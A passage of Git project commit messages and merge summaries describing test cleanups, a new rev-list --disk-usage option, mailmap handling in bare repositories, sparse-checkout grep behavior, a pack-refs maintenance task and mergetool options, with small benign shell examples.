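failing_cmd () {
	echo "partial output"
	return 1
}

# Nested: the outer substitution only sees the exit status of "echo".
nested=$(echo "$(failing_cmd)")
nested_status=$?

# Factored out: the failure is visible and can break an &&-chain.
factored_status=0
inner=$(failing_cmd) || factored_status=$?
```

After this runs, "$nested_status" is 0 while "$factored_status" is 1, so
only the factored-out form lets the surrounding test notice the failure.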
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In order to modernize the tests, move commands that currently run
outside of test cases into a test case. Where possible, clean up files
that are produced using test_when_finished(), but in the case where files
persist over multiple test cases, create a new test case to perform
cleanup.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
For shell scripts, the usual convention is for there to be no space
after redirection operators (e.g. `>file`, not `> file`). Remove these
spaces wherever they appear.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently, the options for the `list` and `show` subcommands are just
listed as `<options>`. This seems to imply, from a cursory glance at the
summary, that they take the stash options listed below. However, reading
more carefully, we see that they take log options and diff options
respectively.
Make it more obvious that they take log and diff options by explicitly
stating this in the subcommand summary.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It can sometimes be useful to see which refs are contributing to the
overall repository size (e.g., does some branch have a bunch of objects
not found elsewhere in history, which indicates that deleting it would
shrink the size of a clone).
You can find that out by generating a list of objects, getting their
sizes from cat-file, and then summing them, like:
git rev-list --objects --no-object-names main..branch |
git cat-file --batch-check='%(objectsize:disk)' |
perl -lne '$total += $_; END { print $total }'
Though note that the caveats from git-cat-file(1) apply here. We "blame"
base objects more than their deltas, even though the relationship could
easily be flipped. Still, it can be a useful rough measure.
But one problem is that it's slow to run. Teaching rev-list to sum up
the sizes can be much faster for two reasons:
1. It skips all of the piping of object names and sizes.
2. If bitmaps are in use, for objects that are in the
bitmapped packfile we can skip the oid_object_info()
lookup entirely, and just ask the revindex for the
on-disk size.
This patch implements a --disk-usage option which produces the same
answer in a fraction of the time. Here are some timings using a clone of
torvalds/linux:
[rev-list piped to cat-file, no bitmaps]
$ time git rev-list --objects --no-object-names --all |
git cat-file --buffer --batch-check='%(objectsize:disk)' |
perl -lne '$total += $_; END { print $total }'
1459938510
real 0m29.635s
user 0m38.003s
sys 0m1.093s
[internal, no bitmaps]
$ time git rev-list --disk-usage --objects --all
1459938510
real 0m31.262s
user 0m30.885s
sys 0m0.376s
Even though the wall-clock time is slightly worse due to parallelism,
notice the CPU savings between the two. We saved 21% of the CPU just by
avoiding the pipes.
But the real win is with bitmaps. If we use them without the new option:
[rev-list piped to cat-file, bitmaps]
$ time git rev-list --objects --no-object-names --all --use-bitmap-index |
git cat-file --batch-check='%(objectsize:disk)' |
perl -lne '$total += $_; END { print $total }'
1459938510
real 0m6.244s
user 0m8.452s
sys 0m0.311s
then we're faster to generate the list of objects, but we still spend a
lot of time piping and looking things up. But if we do both together:
[internal, bitmaps]
$ time git rev-list --disk-usage --objects --all --use-bitmap-index
1459938510
real 0m0.219s
user 0m0.169s
sys 0m0.049s
then we get the same answer much faster.
For "--all", that answer will correspond closely to "du objects/pack",
of course. But we're actually checking reachability here, so we're still
fast when we ask for more interesting things:
$ time git rev-list --disk-usage --use-bitmap-index v5.0..v5.10
374798628
real 0m0.429s
user 0m0.356s
sys 0m0.072s
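As a rough illustration of the "more interesting things" one might ask,
the sketch below prints, for each local branch, the on-disk size of the
objects reachable from it but not from a base ref. The helper name
branch_disk_usage and the default base "main" are made up for this
example, and it assumes a Git that already understands --disk-usage.

```shell
# Illustrative helper, not part of Git: print "<bytes> <branch>" for
# every local branch, counting only objects not reachable from the base.
branch_disk_usage () {
    base=${1:-main}
    git for-each-ref --format='%(refname:short)' refs/heads/ |
    while read -r branch
    do
        # The base itself would always report nothing of interest.
        test "$branch" = "$base" && continue
        printf '%s %s\n' \
            "$(git rev-list --disk-usage --objects "$base..$branch")" \
            "$branch"
    done
}
```

Piping the result through "sort -rn" lists the heaviest branches first.
When bitmaps are available, adding --use-bitmap-index to the rev-list
call should give the speedup shown in the timings above.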
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When `gc.writeCommitGraph = true`, it is possible that the commit-graph
is _still_ not written: replace objects, grafts and shallow repositories
are incompatible with the commit-graph feature.
Under such circumstances, we need to indicate to the user why the
commit-graph was not written instead of staying silent about it.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Acked-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Whenever a user runs `git reflog expire --stale-fix`, the most likely
reason is that their repository is at least _somewhat_ corrupt. Which
means that it is more than just possible that some objects are missing.
If that is the case, the command can currently abort in
the phase where it tries to mark all reachable objects.
Instead of adding insult to injury, let's be gentle and continue as best
as we can in such a scenario, simply by ignoring the missing objects and
moving on.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Fix a memory leak in 296d4a94e7 (diff: add -I<regex> that ignores
matching changes, 2020-10-20) by freeing the memory it allocates in
the newly introduced diff_free(). See the previous commit for details
on that.
This memory leak was intentionally introduced in 296d4a94e7, see the
discussion on a previous iteration of it in
https://lore.kernel.org/git/xmqqeelycajx.fsf@gitster.c.googlers.com/
At that time freeing the memory was somewhat tedious, but since it
isn't anymore with the newly introduced diff_free() let's use it.
Let's retain the pattern for diff_free_file() and add a
diff_free_ignore_regex(), even though (unlike "diff_free_file") we
don't need to call it elsewhere. I think this'll make for more
readable code than gradually accumulating a giant diff_free()
function, sharing "int i" across unrelated code etc.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a diff_free() function to free anything we may have allocated in
the "diff_options" struct, and the ability to make calling it a noop
by setting "no_free" in "diff_options".
This is required because when e.g. "git diff" is run we'll allocate
things in that struct, use the diff machinery once, and then exit.
But if we run e.g. "git log -p" we're going to re-use what we
allocated across multiple diff_flush() calls, and only want to free
things at the end.
We've thus ended up with features like the recently added "diff -I"[1]
where we'll leak memory. As it turns out it could have simply used the
pattern established in 6ea57703f6 (log: prepare log/log-tree to reuse
the diffopt.close_file attribute, 2016-06-22).
Manually adding more such flags to things like log_tree_commit() every
time we need to allocate something would be tedious. Let's instead move
that fclose() code to a new diff_free(), in anticipation of freeing
more things in that function in follow-up commits.
Some functions such as log_tree_commit() need an idiom of optionally
retaining a previous "no_free", as they may either free the memory
themselves, or their caller may do so. I'm keeping that idiom in
log_show_early() for good measure, even though I don't think it's
currently called in this manner. It also gets passed an existing
"struct rev_info", so future callers may want to set the "no_free"
flag.
This change is a bit hard to read because while the freeing pattern
we're introducing isn't unusual, the "file" member is a special
snowflake. We usually don't want to fclose() it. This is because
"file" is usually stdout, in which case we don't want to fclose()
it. We only want to opt-in to closing it when we e.g. open a file on
the filesystem. Thus the opt-in "close_file" flag.
So the API in general just needs a "no_free" flag to defer freeing,
but the "file" member still needs its "close_file" flag. This is made
more confusing because while refactoring this code we could replace
some "close_file=0" with "no_free=1", whereas others need to set both
flags.
This is because there were some cases where an existing "close_file=0"
meant "let's defer deallocation", and others where it meant "we don't
want to close this file handle at all".
1. 296d4a94e7 (diff: add -I<regex> that ignores matching changes,
2020-10-20)
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As a follow-up to d162b25f95 (tests: remove support for
GIT_TEST_GETTEXT_POISON, 2021-01-20) remove most uses of test_i18ncmp
via a simple s/test_i18ncmp/test_cmp/g search-replacement.
I'm leaving t6300-for-each-ref.sh out due to a conflict with in-flight
changes between "master" and "seen", as well as the prerequisite
itself due to other changes between "master" and "next/seen" which add
new test_i18ncmp uses.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove the last uses of the C_LOCALE_OUTPUT prerequisite as well as
the prerequisite itself. This is a follow-up to d162b25f95 (tests:
remove support for GIT_TEST_GETTEXT_POISON, 2021-01-20), as well as
the preceding commit where we removed the simpler uses of
C_LOCALE_OUTPUT.
Here I'm slightly refactoring a test added in 21e5ad50fc (safecrlf:
Add mechanism to warn about irreversible crlf conversions,
2008-02-06), as well as getting rid of another "test_have_prereq
C_LOCALE_OUTPUT" use.
I'm not leaving the prerequisite itself in place for in-flight changes
as there currently are none that introduce new tests that rely on it,
and because C_LOCALE_OUTPUT is currently a noop on the master branch
we likely won't have any new submissions that use it.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As a follow-up to d162b25f95 (tests: remove support for
GIT_TEST_GETTEXT_POISON, 2021-01-20) remove those uses of the now
always true C_LOCALE_OUTPUT prerequisite from those tests which
declare it as an argument to test_expect_{success,failure}.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Follow up on my 73c01d25fe (tests: remove uses of
GIT_TEST_GETTEXT_POISON=false, 2021-01-20) by removing the last uses
of GIT_TEST_GETTEXT_POISON=*.
These assignments were part of a branch that was in-flight at the time
of the gettext poison removal. See 466f94ec45 (Merge branch
'ab/detox-gettext-tests', 2021-02-10) and c7d6d419b0 (Merge branch
'ab/mktag', 2021-01-25) for the merging of the two branches.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
`git help gc` contains this snippet:
"[...] it will keep [..] objects referenced by the index,
remote-tracking branches, notes saved by git notes under refs/notes/"
I had interpreted that as saying that the objects that notes were
attached to are kept, but that is not the case. Let's clarify the
documentation by moving out the part about git notes to a separate
sentence.
Signed-off-by: Martin von Zweigbergk <martinvonz@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we have a multiply signed commit, we need to remove the signature
in the header before verifying the object, since the trailing signature
will not be over both pieces of data. Do so, and verify that we
validate the signature appropriately.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we parse a signature in the ref-filter code, we continually
increment the buffer pointer. Hoist the signature parsing above the
blank line delimiting headers and body so we can find the signature when
using a header to sign the buffer.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently only commits are signed with headers. However, in the future,
we'll also sign tags with headers as well. Let's refactor out a
function called parse_buffer_signed_by_header which does exactly that.
In addition, since we'll want to sign things other than commits this
way, let's call the function sign_with_header instead of do_sign_commit.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We have a function which parses a buffer with a signature at the end,
parse_signature, and this function is used for signed tags. However,
we'll need to store values for multiple algorithms, and we'll do this by
using a header for the non-default algorithm.
Adjust the parse_signature interface to store the parsed data in two
strbufs and turn the existing function into parse_signed_buffer. The
latter is still used in places where we know we always have a signed
buffer, such as push certs.
Adjust all the callers to deal with this new interface.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The version of Ubuntu Linux used by default at GitHub Actions CI
has been updated to one that lacks coccinelle; until it gets fixed,
work around it by sticking to the previous release (18.04).
* tb/ci-run-cocci-with-18.04:
.github/workflows/main.yml: run static-analysis on bionic
Get rid of "GETTEXT_POISON" support altogether, which may or may
not be controversial.
* ab/detox-gettext-tests:
tests: remove uses of GIT_TEST_GETTEXT_POISON=false
tests: remove support for GIT_TEST_GETTEXT_POISON
ci: remove GETTEXT_POISON jobs
Update support for invalid UTF-8 in PCRE2.
* ab/grep-pcre-invalid-utf8:
grep/pcre2: better support invalid UTF-8 haystacks
grep/pcre2 tests: don't rely on invalid UTF-8 data test
The support for deprecated PCRE1 library has been dropped.
* ab/retire-pcre1:
Remove support for v1 of the PCRE library
config.mak.uname: remove redundant NO_LIBPCRE1_JIT flag
Some pretty-format specifiers do not need the data in commit object
(e.g. "%H"), but we were over-eager to load and parse it, which has
been made even lazier.
* jk/pretty-lazy-load-commit:
pretty: lazy-load commit data when expanding user-format
Cleaning various codepaths up.
* ds/more-index-cleanups:
t1092: test interesting sparse-checkout scenarios
test-lib: test_region looks for trace2 regions
sparse-checkout: load sparse-checkout patterns
name-hash: use trace2 regions for init
repository: add repo reference to index_state
fsmonitor: de-duplicate BUG()s around dirty bits
cache-tree: extract subtree_pos()
cache-tree: simplify verify_cache() prototype
cache-tree: clean up cache_tree_update()
When "git rebase -i" processes "fixup" insn, there is no reason to
clean up the commit log message, but we did the usual stripspace
processing. This has been corrected.
* js/rebase-i-commit-cleanup-fix:
rebase -i: do leave commit message intact in fixup! chains
Code clean-up.
* jk/t0000-cleanups:
t0000: consistently use single quotes for outer tests
t0000: run cleaning test inside sub-test
t0000: run prereq tests inside sub-test
t0000: keep clean-up tests together
Lose the debugging aid that may have been useful in the past, but
no longer is, in the "grep" codepaths.
* ab/lose-grep-debug:
grep/log: remove hidden --debug and --grep-debug options
Code clean-up to ensure our use of hashtables using object names as
keys use the "struct object_id" objects, not the raw hash values.
* jk/use-oid-pos:
oid_pos(): access table through const pointers
hash_pos(): convert to oid_pos()
rerere: use strmap to store rerere directories
rerere: tighten rr-cache dirname check
rerere: check dirname format while iterating rr_cache directory
commit_graft_pos(): take an oid instead of a bare hash
This behavior of git-rev-parse is observed since git 1.8.3.1
at least(*), and likely earlier versions.
At least one git-reliant project in-the-wild relies on this
current behavior of git-rev-parse being able to handle multiple
--since= arguments without squeezing identical results together.
So add a test to prevent the potential for regression in
downstream projects.
(*) 1.8.3.1 is the version packaged for CentOS 7.x
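For illustration, the behavior being protected looks roughly like the
sketch below: each --since= argument is expected to produce its own
--max-age= line, and the repeated argument is not collapsed. The
function name and the timestamps are arbitrary choices for this
example, and it assumes it is run inside a repository.

```shell
# Illustrative only: pass four --since= arguments, two of them identical,
# and let rev-parse print one translated line per argument.
show_since_args () {
    git rev-parse \
        --since=1970-01-01T00:00:01Z \
        --since=1970-01-01T00:00:01Z \
        --since=1970-01-01T00:00:03Z \
        --since=1970-01-01T00:00:02Z
}
```

A caller that feeds the output to another command can therefore rely on
getting as many lines back as it passed arguments in.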
Signed-off-by: Eric Wong <e@80x24.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Sort the lines starting with "/", the only out-of-place line was added
along with most of the file in 614f4f0f35 (Fix the remaining tests
that failed with core.autocrlf=true, 2017-05-09).
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Move a function added to test-lib-functions.sh in ea047a8eb4 (t5310:
factor out bitmap traversal comparison, 2020-02-14) into a new
lib-bitmap.sh.
The test-lib-functions.sh file should be for functions that are widely
used across the test suite, if something's only used by a few tests it
makes more sense to have it in a lib-*.sh file.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Rename gitweb-lib.sh to lib-gitweb.sh for consistency with other test
library files.
When it was introduced in 05526071cb (gitweb: split test suite into
library and tests, 2009-08-27) this naming pattern was more
common.
Since then all but one other such library which didn't start with
"lib-*.sh" such as t6000lib.sh has been renamed, see
e.g. 9d488eb40e (Move t6000lib.sh to lib-*, 2010-05-07).
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Rename the recently introduced test-bundle-functions.sh to be
consistent with other lib-*.sh files, which is the convention for
these sorts of shared test library functions.
The new test-bundle-functions.sh was introduced in 9901164d81 (test:
add helper functions for git-bundle, 2021-01-11). It was the only
test-*.sh of this nature.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Since d5cfd142ec (tests: teach the test-tool to generate NUL bytes
and use it, 2019-02-14) the generate_zero_bytes() function has been a
thin wrapper for "test-tool genzeros". Let's have its only user call
that directly instead.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Move the test_set_index_version() function to its only user. This
function has only been used in one place since its addition in
5d9fc888b4 (test-lib: allow setting the index format version,
2014-02-23). Let's have that test script define it.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change two uses of "error" in test-lib-functions.sh to "BUG".
In the first instance in "test_cmp_rev" the author of the "BUG"
function added in [1] had another in-flight patch adding this in [2],
and the two were never consolidated.
In the second case, "test_atexit" added in [3], the fact that we could
have used "BUG" instead appears to have been missed.
1. 165293af3c (tests: send "bug in the test script" errors to the
script's stderr, 2018-11-19)
2. 30d0b6dccb (test-lib-functions: make 'test_cmp_rev' more
informative on failure, 2018-11-19)
3. 900721e15c (test-lib: introduce 'test_atexit', 2019-03-13)
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove the check_var_migration() migration helper. This was added back
in [1], [2] and [3] to warn users to migrate from e.g. the
"GIT_FSMONITOR_TEST" name to "GIT_TEST_FSMONITOR".
I daresay that having been warning about this since late 2018 (or
v2.20.0) was sufficient time to give everyone interested a heads-up
about moving to the new names.
I don't see the need for going through the "do this later" codepath
anticipated in [1], let's just remove this instead.
1. 4cb54d0aa8 (fsmonitor: update GIT_TEST_FSMONITOR support,
2018-09-18)
2. 1f357b045b (read-cache: update TEST_GIT_INDEX_VERSION support,
2018-09-18)
3. 5765d97b71 (preload-index: update GIT_FORCE_PRELOAD_TEST support,
2018-09-18)
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When trying to find a .mailmap file, we will always look for it in the
current directory. This makes sense in a repository with a working tree,
since we'd always go to the toplevel directory at startup. But for a
bare repository, it can be confusing. With an option like --git-dir (or
$GIT_DIR in the environment), we don't chdir at all, and we'd read
.mailmap from whatever directory you happened to be in before starting
Git.
(Note that --git-dir without specifying a working tree historically
means "the current directory is the root of the working tree", but most
bare repositories will have core.bare set these days, meaning they will
realize there is no working tree at all).
The documentation for gitmailmap(5) says:
If the file `.mailmap` exists at the toplevel of the repository[...]
which likewise reinforces the notion that we are looking in the working
tree.
This patch prevents us from looking for such a file when we're in a bare
repository. This does break something that used to work:
cd bare.git
git cat-file blob HEAD:.mailmap >.mailmap
git shortlog
But that was never advertised in the documentation. And these days we
have mailmap.blob (which defaults to HEAD:.mailmap) to do the same thing
in a much cleaner way.
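A sketch of that cleaner route, assuming the repository carries a
.mailmap at the root of HEAD. The wrapper name bare_shortlog is invented
for this example, and mailmap.blob is spelled out only for clarity since
it is described above as the default:

```shell
# Illustrative wrapper: summarize authors of a bare repository using the
# .mailmap stored in its HEAD commit rather than a file in the cwd.
bare_shortlog () {
    git --git-dir="$1" -c mailmap.blob=HEAD:.mailmap shortlog -sn HEAD
}
```

Called as "bare_shortlog bare.git", this needs no .mailmap file on disk
at all.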
However, there's one more interesting case: we might not have a
repository at all! The git-shortlog command can be run with git-log
output fed on its stdin, and it will apply the mailmap. In that case, it
probably does make sense to read .mailmap from the current directory.
This patch will continue to do so.
That leads to one even weirder case: if you run git-shortlog to process
stdin, the input _could_ be from a different repository entirely. Should
we respect the in-tree .mailmap then? Probably yes. Whatever the source
of the input, if shortlog is running in a repository, the documentation
claims that we'd read the .mailmap from its top-level (and of course
it's reasonably likely that it _is_ from the same repo, and the user
just preferred to run git-log and git-shortlog separately for whatever
reason).
The included test covers these cases, and we now document the "no repo"
case explicitly.
We also add a test that confirms we find a top-level ".mailmap" even
when we start in a subdirectory of the working tree. This worked both
before and after this commit, but we never tested it explicitly (it
works because we always chdir to the top-level of the working tree if
there is one).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 7b35efd734 (fsck_walk(): optionally name objects on the go,
2016-07-17), the `fsck` machinery learned to optionally name the
objects, so that it is easier to see what part of the repository is in a
bad shape, say, when objects are missing.
To save on complexity, this machinery uses a parser to determine the
name of a parent given a commit's name: any `~<n>` suffix is parsed and
the parent's name is formed from the prefix together with `~<n+1>`.
However, this parser has a bug: if it finds a suffix `<n>` that is _not_
`~<n>`, it will mistake the empty string for the prefix and `<n>` for
the generation number. In other words, it will generate a name of the
form `~<bogus-number>`.
Let's fix this.
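The intended naming rule can be sketched in shell as follows. This is
only an illustration of the rule described above, not the fsck code
(which is C); the function name first_parent_name is made up, and
appending "^" to names without a `~<n>` suffix is an assumption of this
sketch.

```shell
# Illustrative sketch only; fsck itself does this in C.
# Print the name of the first parent of the commit named "$1".
first_parent_name () {
    name=$1
    case "$name" in
    *'~'*)
        prefix=${name%'~'*}    # text before the last "~"
        suffix=${name##*'~'}   # text after the last "~"
        case "$suffix" in
        '' | *[!0-9]*)
            ;;    # not a "~<n>" suffix, handled below
        *)
            printf '%s~%s\n' "$prefix" "$((suffix + 1))"
            return
            ;;
        esac
        ;;
    esac
    # Assumption of this sketch: other names just get "^" appended.
    printf '%s^\n' "$name"
}
```

The important property is that a name such as "v2", which ends in
digits but has no "~" before them, keeps its full prefix instead of
turning into a bare `~<bogus-number>`.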
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This function can be simplified by using the `test_oid_to_path()`
helper, which incidentally also makes it more robust by not relying on
the exact file system layout of the loose object files.
While at it, do not define those functions in a test case, it buys us
nothing.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
On a sparse checked out repository, `git grep` (without --cached) ends
up searching the cache when an entry matches the search pathspec and has
the SKIP_WORKTREE bit set. This is confusing both because the sparse
paths are not expected to be in a working tree search (as they are not
checked out), and because the output mixes working tree and cache
results without distinguishing them. (Note that grep also resorts to the
cache on working tree searches that include --assume-unchanged paths.
But the whole point in that case is to assume that the contents of the
index entry and the file are the same. This does not apply to the case
of sparse paths, where the file isn't even expected to be present.)
Fix that by teaching grep to honor the sparse-checkout rules for working
tree searches. If the user wants to grep paths outside the current
sparse-checkout definition, they may either update the sparsity rules to
materialize the files, or use --cached to search all blobs registered in
the index.
Note: it might also be interesting to add a configuration option that
allows users to search paths that are present despite having the
SKIP_WORKTREE bit set, and/or to restrict searches in the index and past
revisions too. These ideas are left as future improvements to avoid
conflicting with other sparse-checkout topics currently in flight.
Suggested-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Reviewed-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When the 'maintenance.strategy' config option is set to 'incremental',
a default maintenance schedule is enabled. Add the 'pack-refs' task to
that strategy at the weekly cadence.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It is valuable to collect loose refs into a more compressed form. This
is typically the packed-refs file, although this could be the reftable
in the future. Having packed refs can be extremely valuable in repos
with many tags or remote branches that are not modified by the local
user, but still are necessary for other queries.
For instance, with many exploded refs, commands such as
git describe --tags --exact-match HEAD
can be very slow (multiple seconds). This command in particular is used
by terminal prompts to show when a detached HEAD is pointing to an
existing tag, so having it be slow causes significant delays for users.
Add a new 'pack-refs' maintenance task. It runs 'git pack-refs --all
--prune' to move loose refs into a packed form. For now, that is the
packed-refs file, but could adjust to other file formats in the future.
This is the first of several sub-tasks of the 'gc' task that could be
extracted to their own tasks. In this process, we should not change the
behavior of the 'gc' task since that remains the default way to keep
repositories maintained. Creating a new task for one of these sub-tasks
only provides more customization options for those choosing to not use
the 'gc' task. It is certainly possible to have both the 'gc' and
'pack-refs' tasks enabled and run regularly. While they may repeat
effort, they do not conflict in a destructive way.
The 'auto_condition' function pointer is left NULL for now. We could
extend this in the future to have a condition check if pack-refs should
be run during 'git maintenance run --auto'.
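To make the effect concrete, here is a small sketch of what the task's
underlying command does to loose refs. The helper names are invented
for this example, and it assumes the files ref backend with the
repository directory at ".git".

```shell
# Illustrative helper: count tag refs that still exist as loose files.
count_loose_tags () {
    find .git/refs/tags -type f 2>/dev/null | wc -l | tr -d ' '
}

# The command the new task runs, per the description above.
pack_loose_refs () {
    git pack-refs --all --prune
}
```

Comparing count_loose_tags before and after pack_loose_refs shows the
loose files disappearing while the refs remain listed in
.git/packed-refs. With a Git that has this task, the same thing should
be reachable through "git maintenance run --task=pack-refs".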
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
die() messages are traced in trace2, but BUG() messages are not. Anyone
tracking die() messages would have even more reason to track BUG().
Therefore, write to trace2 when BUG() is invoked.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Helped-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a per-tool override flag so that users may enable the flag for one
tool and disable it for another by setting
`mergetool.<tool>.hideResolved` to `false`.
In addition, the author or maintainer of a mergetool may optionally
override the default `hideResolved` value for that mergetool. If the
`mergetools/<tool>` shell script contains a `hide_resolved_enabled`
function it will be called when the mergetool is invoked and the return
value will be used as the default for the `hideResolved` flag.
hide_resolved_enabled () {
return 1
}
Disabling may be desirable if the mergetool wants or needs access to the
original, unmodified 'LOCAL' and 'REMOTE' versions of the conflicted
file. For example:
- A tool may use a custom conflict resolution algorithm and prefer to
ignore the results of Git's conflict resolution.
- A tool may want to visually compare/contrast the version of the file
from before the merge (saved to 'LOCAL', 'REMOTE', and 'BASE') with
Git's conflict resolution results (saved to 'MERGED').
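How a caller might consult such an override can be sketched like this.
The helper default_hide_resolved is hypothetical and is not the code in
git-mergetool--lib; it only illustrates "use the function's return
value as the default if the function exists, otherwise fall back to
true".

```shell
# Hypothetical stand-in for a mergetools/<tool> script that opts out.
hide_resolved_enabled () {
    return 1
}

# Illustrative helper: print the default for hideResolved, taking the
# tool's override into account when one is defined.
default_hide_resolved () {
    if type hide_resolved_enabled >/dev/null 2>&1
    then
        if hide_resolved_enabled
        then
            echo true
        else
            echo false
        fi
    else
        echo true
    fi
}
```

With the stand-in above defined, default_hide_resolved prints "false";
once the function is removed with "unset -f hide_resolved_enabled" it
prints "true" again.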
Helped-by: Johannes Sixt <j6t@kdbg.org>
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Seth House <seth@eseth.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This is preparation for the following commit where we need to source the
mergetool shell script to look for overrides before `run_merge_tool` is
called. Previously `run_merge_tool` both sourced that script and invoked
the mergetool.
In the case of the following commit, we need the result of the
`hide_resolved` override, if present, before we actually run
`run_merge_tool`.
The new `initialize_merge_tool` wrapper is exposed and documented as
a public interface for consistency with the existing `run_merge_tool`
which is also public. Although `setup_tool` could instead be exposed
directly, the related `setup_user_tool` would probably also want to be
elevated to match and this felt the cleanest to me.
Signed-off-by: Seth House <seth@eseth.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The purpose of a mergetool is to help the user resolve any conflicts
that Git cannot automatically resolve. If there is a conflict that must
be resolved manually Git will write a file named MERGED which contains
everything Git was able to resolve by itself and also everything that it
was not able to resolve wrapped in conflict markers.
One way to think of MERGED is as a two- or three-way diff. If each
"side" of the conflict markers is separately extracted an external tool
can represent those conflicts as a side-by-side diff.
However many mergetools instead diff LOCAL and REMOTE both of which
contain versions of the file from before the merge. Since the conflicts
Git resolved automatically are not present it forces the user to
manually re-resolve those conflicts. Some mergetools also show MERGED
but often only for reference and not as the focal point to resolve the
conflicts.
This adds a `mergetool.hideResolved` flag that will overwrite LOCAL and
REMOTE with each corresponding "side" of a conflicted file and thus hide
all conflicts that Git was able to resolve itself. Overwriting these
files will immediately benefit any mergetool that uses them without
requiring any changes to the tool.
No adverse effects were noted in a small survey of popular mergetools[1]
so this behavior defaults to `true`. However it can be globally disabled
by setting `mergetool.hideResolved` to `false`.
[1] https://www.eseth.org/2020/mergetools.html
Original-implementation-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Seth House <seth@eseth.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
One of the conveniences that test_commit offers is making a tag for each
commit. This makes it easy to refer to the commits in subsequent
commands. But it can also be a pain if you care about reachability,
because those tags keep the commits reachable even if they are rewound
from the branch they're made on.
The alternative is that scripts have to call test_tick, git-add, and
git-commit themselves. Let's add a --no-tag option to give them the
one-liner convenience of using test_commit.
This is in preparation for the next patch, which will add some more
calls. But I cleaned up an existing site to show off the feature. There
are probably more cleanups possible.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The options --untracked and --cached are not compatible, but if they are
used together, grep just silently ignores --cached and searches the
working tree. Error out, instead, to avoid any potential confusion.
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Reviewed-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
GitHub Actions is transitioning workflow steps that run on
'ubuntu-latest' from 18.04 to 20.04 [1].
This works fine in all steps except the static-analysis one, since
Coccinelle isn't available on Ubuntu focal (it is only available in the
universe suite).
Until Coccinelle can be installed from 20.04's main suite, pin the
static-analysis build to run on 18.04, where it can be installed by
default.
[1]: https://github.com/actions/virtual-environments/issues/1816
